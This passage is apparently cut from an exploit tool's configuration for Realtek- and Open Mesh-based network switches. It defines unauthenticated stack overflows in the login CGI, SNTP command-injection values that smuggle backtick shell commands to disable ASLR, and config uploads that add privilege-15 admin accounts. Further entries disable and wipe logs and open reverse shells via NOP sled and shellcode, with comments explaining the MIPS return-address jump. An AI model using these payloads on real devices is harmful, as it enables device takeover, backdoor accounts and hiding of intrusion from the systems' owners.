False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username='+ self.random_string(112) + '&password='+ self.random_string(60) + '&STARTUP_BACKUP=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': 
True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t#'encryption':'nopassword',\r\n\t\t\t\t\t\t#'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" nopassword\\n\\n------', # Yep, working too\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > 
/tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: del priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) 
+'_CMD_&STARTUP_BACKUP=1',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':False,\t\t\t\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&_del=0',\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&_del=1',\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > 
/tmp/check`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&STARTUP_BACKUP=1',\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Realtek': {\r\n\t\t\t\t'vendor': 'Realtek',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': 
True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=5121',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_5132=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_5132=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': 
{\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': 
True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':False,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log 
CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB 
workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'OpenMESH': { \r\n\t\t\t\t'vendor': 'Open Mesh, Inc.',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'/loginMsg.js',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t'login_uri':'',\r\n\t\t\t\t\t'query':'',\r\n\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t'logout_uri':'',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'',\r\n\t\t\t\t\t\t'disable_query':'',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'',\r\n\t\t\t\t\t\t'clean_logfile_query':'',\r\n\t\t\t\t\t\t'clean_logmem_uri':'',\r\n\t\t\t\t\t\t'clean_logmem_query':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'security.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': 
False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(280),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'datajson.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/datajson.cgi?login',\r\n\t\t\t\t\t\t\t'content':'usr=admin&pswrd=' + self.random_string(288),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/sn_httpupload.cgi?', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'',\r\n\t\t\t\t\t\t'content':'',\r\n\t\t\t\t\t\t'add_uri':'',\r\n\t\t\t\t\t\t'del_query':'',\r\n\t\t\t\t\t\t'del_uri':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\t# 
<================================\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True, # It is vulnerable, but I am not using this authenticated code here :>\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. 
